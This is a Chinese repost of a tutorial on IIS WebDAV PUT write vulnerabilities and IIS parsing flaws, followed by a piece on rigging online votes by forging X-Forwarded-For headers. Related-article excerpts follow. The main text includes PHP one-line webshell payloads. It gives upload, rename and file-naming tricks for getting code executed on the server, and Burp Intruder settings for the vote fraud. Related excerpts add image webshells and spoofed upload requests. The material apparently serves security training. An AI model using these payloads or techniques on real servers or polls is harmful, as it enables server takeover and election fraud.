IIS写权限漏洞和XFF刷票原理

最新推荐文章于 2025-05-30 07:05:10 发布
转载 最新推荐文章于 2025-05-30 07:05:10 发布 · 281 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/wintrysec/p/10875060.html
文章标签:

#php #shell

本文深入解析IIS服务器的PUT写入漏洞和畸形解析漏洞,包括利用方法及受影响版本。同时,详细介绍了如何利用X-Forwarded-For (XFF) 实现刷票攻击,包括具体步骤和所需工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

IIS写权限漏洞

PUT写入漏洞

此漏洞主要是因为服务器开启了webdav的组件导致的

1.扫描漏洞,yes,可以PUT:

2.用老兵的工具上传一句话文件test.txt,然后move改名为shell.asp

然后菜刀连接成功:

解析漏洞

影响版本:6.0、7.0、7.5

IIS 6.0解析利用方法有两种

1.目录解析

/xx.asp/xx.jpg

在网站下建立文件夹的名字为 .asp或.asa 的文件夹

其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行

2.文件解析

修改一句话文件名为test.asp;.jpg

在IIS6.0下,分号后面的不被解析,也就是说test.asp;.jpg会被服务器看成是mst.asp

还有IIS6.0 默认的可执行文件,除了asp还包含这三种:/mst.asa/mst.cer/mst.cdx

 

IIS 7.0/7.5畸形解析漏洞

在默认Fast-CGI开启状况下,黑阔上传一个名字为mst.jpg文件

内容为:

<?php
fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[wintry])?>’);
?>

然后访问mst.jpg/.php,在这个目录下就会生成一句话木马 shell.php

用到两个工具(完全可以用Burp替代):

1、IIS PUT Scaner By ZwelL 2、桂林老兵IIS写权限利用程序

https://pan.baidu.com/s/1PU70q4unoHt0S01oyuFnKw

第二个写入工具百度云不能分享,自行用Burp代替吧

X-Forwarded-For 刷票原理

刷票的原理是通过X-Forwarded-For(XFF)实现的。

X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址。

一些开发者为了获取客户IP,我们经常会使用request.remote_ip来获得用户IP。

但是很多用户都是通过代理来访问服务器的,如果使用remote_ip这个全局变量来获取IP

开发者往往获得的是代理服务器的IP,并不是用户真正的IP。

                客户端=>正向代理=>透明代理=>服务器反向代理=>Web服务器

下面通过一个例子来实践

实践伪造 XFF

环境链接:点击传送

打开实验环境,是个投票系统,a2019现在是88票第4名,伪造XFF刷到第一名

点击给a2019投票,Burp抓包添加X-Forwarded-For字段,Intruder功能爆破重放

X-Forwarded-For:10.1.§0§.§1§

因为是微信投票,修改User-Agent为:

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G

 

转载于:https://www.cnblogs.com/wintrysec/p/10875060.html

IIS容器之解析漏洞利用
weixin_45253622的博客
03-05 868
IIS 容器之解析漏洞复现 漏洞简介 解析漏洞是指Web服务器对HTTP请求处理不当导致将非执行的脚本,文件等当作可执行的脚本去执行。该漏洞一般配合web容器(iis,nginx,apache,tomcat等)的文件上传功能去使用,以获取服务器的权限IIS 5.X/6.X 解析漏洞 对于IIS服务器5版本6版本存在两个解析漏洞,分别为目录解析文件解析。 目录解析 简介:在网站下建立文件夹的名称中以 .asp或 .asa等作为后缀的文件夹,其目录内任何扩展名的文件都被IIS当作asp可执行文件去解析并
XFF漏洞利用说明
墨痕诉清风的博客
10-09 2532
X-Forwarded-For(XFF) XFF是header请求中的一个参数 是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。 代表了HTTP的请求端真实的IP。 X-Forwarded-For: client1, proxy1, proxy2, proxy3 //浏览器IP,第一个代理服务器,第二个三个四个等等 利用方式 1.绕过服务器过滤 XFF漏洞也称为IP欺骗。 有些服务器通过XFF判断是否是本地服务器,当判断为本地服务器时,
刷票小程序案例原理剖析(pythonjava)
weixin_33770878的博客
06-01 2362
你还在苦苦拉票吗? 前言 现在生活中离不开各类的比赛,然而,各个比赛离不开投票,我们会清一色有时候找到我们的朋友在朋友圈发—帮宝贝投一票,帮某某老师,学生投一票。又或许你自己参加比赛,你在为你自己拉票。 剖析投票原理 作为一名程序员,你是否想为自己的生活开一点G呢?熟悉网络请求的我们,应该从问题根源分析问题。对于一个投票的网站。大致分为两类: 登录类: 这类网站是确实不太好操作,一般是每个账户...
一文读懂 XFF 字段原理漏洞与防范
ICT系统集成阿祥
05-30 777
它诞生的初衷是充满善意的,旨在当客户端通过代理服务器访问网站时,代理服务器能够在请求中添加 X - Forwarded - For 字段,并将客户端的真实 IP 地址填入其中,这样后端服务器就能清晰知晓真正发起请求的客户端是谁。最终,黑客获取了大量客户的账户信息,包括敏感的资金数据个人身份信息。倘若后端服务器没有对这个字段进行严格的验证处理,就如同在自家门口随意接纳不明身份的访客,可能会根据伪造的 IP 地址做出错误的判断,比如给予非法访问权限、记录错误的用户行为等,进而导致安全漏洞
MySQL安全登录策略
Innocence_0的博客
06-03 2294
进入 MySQL 命令行,通过 show plugins;或者show variables like ‘validate%’;相关参数可以判断是否已安装此插件。若没有相关参数则代表未安装此插件安装前检查 为空则说明未安装此插件。
IIS 漏洞工具解析
明哥哥知识分享
09-16 2592
1. 概述通过学习文档内容。 熟悉并掌握 IIS 漏洞利用工具的利用方法,了解具体的功能内 容,亲自实践操作,并根据课程需求完成相关任务。 2. 工具功能说明 IIS 漏洞利用工具是由桂林老兵的一款漏洞利用工具,专门针对 IIS 漏洞。 接下来我们具体介绍一下相关的使用。 2.1.第一部分 数据包格式 该功能模块默认的数据包传输方法有 7 种,分别是: OPTIONS 返回服务器的各种信息 PUT 生成上传文件数据包的。 POST 用来提交表单 MOVE 是改名数据包。 COPY 是复制数
XFF注入原理分析
m0_46304840的博客
03-11 4838
目录 前言: 正文 0x01:xff源码以及形成 0x02 xff注入方式 第一种 union注入 1)爆出库名 第二种 报错注入(updatexml & exctractvalue) 前言: 关于SQL注入还有好多种,前面的都是基于mysql环境下,接下来会更新其他数据库该如何注入 但是前面的得认真观看,以及源码...
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6431
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
termux获取sd卡读权限_stm32 SPI读储存卡(MicroSD TF卡)
weixin_39629467的博客
11-21 2896
简述花了较长的时间,来弄读储存卡(大部分教程讲的比较全但是不是很容易懂),这里希望我的代码经验能够帮助到你。操作分析及实现0.整个流程1、上电以后储存卡的初始化2、如何进行读实现1.上电以后储存卡的初始化上电给MicroSD卡至少74个时钟信号发送CDM0 (x041)复位发送CMD1 让MicroSD卡进入SPI模式2.如何进行读这里主要对1,3进行详细的讨论你需要知道的是spi通信是怎样...
针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf
MickeyMouse1928的博客
05-04 4912
环境: Kali攻击机1 IP:192.168.114.140 Win7攻击机2 IP(安装gccpython2.7):192.168.114.130 Windows server 2003目标主机(开启webdev服务):192.168.114.132   在攻击机1中的操作: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpre
XFFreferer
世间繁华梦一出
11-08 2600
1、XFF的作用 X-Forwarded-ForXFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求字段。 Squid 缓存代理服务器的开发人员最早引入了这一HTTP字段,并由IETF在HTTP字段标准化草案中正式提出。 当今多数缓存服务器的用户为大型ISP,为了通过缓存的方式来降低他们的外部带宽,他们常常通过鼓励或强制用户使用代理服务器来接入互联网。有些情况下,这些代理服务器是透明代理,用户甚至不知道自己正在使用代理上网。 如果没有XFF或者另外
IIS权限利用工具
03-07
IIS权限利用工具 网络攻防信息安全 是的
IIS漏洞大全(附修复方法)
C233333235的博客
08-07 4512
IlS Server 在 Web 服务扩展中开启了 WebDAV,配置了可以入的权限,造成任意文件上传。漏洞复现本地搭建2003 server1)开启 WebDAV 权限:做好准备工作后开启环境,然后我们去访问配置的IP,访问到如下页面然后开启抓包刷新页面,在抓到的数据包后将其发送到重放器,将请求方式改为OPTIONS后点击发送,在返回包中就可以看到可以使用的请求方式。
XFF 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-29 1623
XFF 注入漏洞原理以及修复方法
一篇了解Java反射
qq_44005305的博客
09-10 144
1.Class也是类,也继承Object类2.Class类对象不是new出来的,而是系统创建的 (都是通过Classloader类创建的)3.每个类的Class类对象,在内存中只有一份,因为类只加载一次。
Web中间件漏洞总结——IIS
2401_88858891的博客
11-20 1442
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,如PUT,使应用程序可对Web Server直接读,并支持文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。可以像在操作本地文件夹一样操作服务器上的文件夹,该扩展也存在缺陷,利用PUT方法可直接向服务器上传恶意文件,控制服务器。为了兼容16位MS-DOS程序,Windows为文件名较长的文件(文件夹)生成了对应的windows 8.3 短文件名。
IIS调用X-Forwarded-For Header (XFF)记录访客真实IP
hzfw2008的博客
03-24 4680
问题:通过IIS发布的网站放到F5设备后边,通过透明监听模式WAF设备过滤后,公网访问者的真实IP被WAF设备IP替代,在网站日志看不到原来的真实IP了。 处理方案1:利用第三方IIS插件调用X-Forwarded-For获得来访者的真实IP,解决IIS放在f5后记录不到用户ip的问题。 处理方案2:使用微软官方的高级日志模块功能调用X-Forwarded-For记录真实IP; 请注意,以上2...
墨者学院 - IIS权限漏洞分析溯源
多崎巡礼的博客
08-29 1508
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。     iis scan工具链接 链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54 ...
攻防世界新手区Web-writeup
eeeric7的博客
07-25 475
Web1view_source F12查看网页源代码得到flag Web-2 robots Robots协议:即Robots Exclusion Standard网络爬虫排除协议。 作用:网站告知网络爬虫哪些页面可以爬取,哪些不能爬取 形式:在网站根目录下的robots.txt文件 robots.txt文件应该放在网站根目录下。 当robots访问一个网站时,首先会检查该网站中是否存在http://www.xxx.com/robots.txt这个文件,如果机器人找到这个文件..
zvuldrill文件上传漏洞原理
最新发布
06-14
<think>我们正在讨论ZVulDrill文件上传漏洞原理分析。根据引用[3]中提到的内容,文件上传漏洞通常涉及攻击者绕过安全检测机制上传恶意文件。虽然引用中没有直接说明ZVulDrill的具体实现,但我们可以基于一般文件上传漏洞原理进行推导。一般文件上传漏洞原理包括:1.服务器未对上传文件的类型、内容进行严格验证2.服务器配置不当导致某些文件被解析执行(如Apache的.htaccess配置、IIS的解析漏洞等)3.攻击者利用截断、双重后缀、大小变换等技巧绕过前端验证在ZVulDrill靶场中,可能模拟了以下漏洞场景:-前端仅使用JavaScript验证文件扩展名,攻击者可禁用JS或修改请求绕过-服务器端未检查文件内容类型(MIME类型)或仅检查HTTP(可伪造-存在解析漏洞,例如上传包含恶意代码的图片文件(如`shell.jpg.php`),利用服务器解析顺序执行恶意代码具体到ZVulDrill的实现,参考引用[4]中提到的“ZVulDrill靶场二次开发”,其可能继承了常见靶场(如Upload-labs)的漏洞设计模式。例如:```php//模拟有漏洞的上传处理代码(PHP示例)$target_dir="uploads/";$target_file=$target_dir.basename($_FILES["file"]["name"]);//漏洞点:仅检查文件扩展名且未规范化处理$imageFileType=strtolower(pathinfo($target_file,PATHINFO_EXTENSION));if($imageFileType!="jpg"&&$imageFileType!="png"){echo"只允许JPG/PNG文件";}else{move_uploaded_file($_FILES["file"]["tmp_name"],$target_file);echo"文件已上传至:".htmlspecialchars($target_file);}```攻击者可利用:1.**扩展名黑名单绕过**:使用`.php5`,`.phtml`等未被禁止的扩展名2.**双扩展名**:如`shell.php.jpg`(若服务器仅检查最后缀名)3.**%00截断**:在旧版PHP中,若文件名参数可控,可利用空字节截断(如`shell.php%00.jpg`实际保存为`shell.php`)对于解析漏洞的利用,ZVulDrill可能模拟:-**IIS6.0解析漏洞**:上传`shell.asp;.jpg`会被当作ASP执行-**Apache解析漏洞**:若存在畸形文件名如`shell.php.xxx`可能被解析为PHP§§相关问题§§1.ZVulDrill靶场中文件上传漏洞的具体挑战有哪些?2.如何防御文件上传漏洞?3.除了ZVulDrill,还有哪些靶场可以练习文件上传漏洞?</think>### ZVulDrill文件上传漏洞原理分析 ZVulDrill是一款专注于Web漏洞训练的靶场平台,其文件上传漏洞模块模拟了真实环境中常见的文件上传安全缺陷。核心原理是通过构造特殊文件绕过服务器的安全检测机制,实现恶意文件上传。以下是关键技术原理分析: #### 1. **客户端验证绕过** - **原理**:靶场仅依赖前端JavaScript验证文件扩展名(如仅允许`.jpg`, `.png`) - **攻击方式**:禁用浏览器JS或修改HTTP请求,直接上传`.php`文件 - **示例漏洞代码**: ```javascript // 前端伪代码(易被绕过) function checkFile() { var ext = file.value.split('.').pop().toLowerCase(); if (ext !== 'jpg' && ext !== 'png') { alert("仅支持图片格式!"); return false; } return true; } ``` #### 2. **MIME类型欺骗** - **原理**:服务器仅检查HTTP的`Content-Type`(如`image/jpeg`) - **攻击方式**:篡改上传请求的MIME类型 ```http POST /upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg // 伪造MIME类型 <?php system($_GET['cmd']); ?> ``` #### 3. **解析漏洞利用** - **原理**:服务器配置缺陷导致非执行文件被解析 - **ZVulDrill模拟场景**: - **IIS 6.0目录解析**:`/uploads/shell.asp;.jpg` → 执行ASP代码 - **Nginx畸形路径**:`/uploads/shell.jpg%00.php` → 截断为`.php` - **Apache双重后缀**:`shell.php.jpg` → 优先执行`.php` #### 4. **文件内容检测绕过** - **原理**:靶场使用简单的文件检查(如`FFD8FF`标识JPEG) - **攻击方式**:在恶意脚本前添加合法文件 ```php // 图片马示例 \xFF\xD8\xFF\xE0 // JPEG文件 <?php eval($_POST['cmd']); ?> // 隐藏的PHP代码 ``` #### 5. **路径遍历漏洞** - **原理**:未过滤文件名中的特殊字符 - **攻击示例**: 上传`../../../var/www/html/shell.php` → 覆盖Web目录文件 > **漏洞本质**:ZVulDrill通过禁用或弱化安全机制(如未启用文件重命名、未设置隔离存储、禁用WAF规则),模拟开发者常见的配置失误,帮助学习者理解防御要点[^3][^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值